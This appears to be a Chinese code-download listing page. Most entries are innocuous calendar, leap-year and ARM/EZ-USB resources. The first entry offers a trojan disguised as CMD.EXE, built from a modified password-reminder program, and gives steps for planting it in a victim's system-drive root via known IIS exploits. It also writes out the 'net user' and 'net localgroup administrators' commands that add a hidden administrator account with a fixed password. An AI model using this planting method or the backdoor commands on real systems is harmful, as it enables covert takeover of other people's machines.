你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级
上传时间: 2015-01-12
上传用户:qlpqlq
万年历的完整算法:1900~2100 它首先计算出对应阳历月第一天对应是星期几,然后根据数据压缩算法确定, 确定对应的阴历日期; 而阴历节气,则有条件规律算法实现 这个万年历包括 阳历 阴历 星期对照 阴历 天干地支 生肖
上传时间: 2014-01-14
上传用户:zhouli
ZLG LPC 2100 新easyARM2100光盘
上传时间: 2013-12-09
上传用户:songrui
EZ-USB 2100系列单片机原理、编程及应用.PDF 北航出版社 编著者:颜荣江 余志强 张进 阴大兴
上传时间: 2015-12-08
上传用户:lili123
这是2100的工程模板 ,许多功能可以自己加进去
上传时间: 2014-06-03
上传用户:Divine
带有农历的日历(QT版本1752-2100)
上传时间: 2013-12-19
上传用户:TF2015
《EZ-USB 2100系列单片机原理、编程及应用》
上传时间: 2013-12-06
上传用户:yiwen213
〈EZUSB FX 2100系列单片机USB外围器件设计与应用〉
上传时间: 2016-02-28
上传用户:ecooo
判断闰年 根据输入的具体年份(在1900-2100之间,要求对输入有效性进行检查)判断是否闰年,并给出相应的提示信息。
上传时间: 2014-01-07
上传用户:thesk123
基于ARM7下的2100系列得uc-osII的工程模板!
上传时间: 2013-12-22
上传用户:whenfly
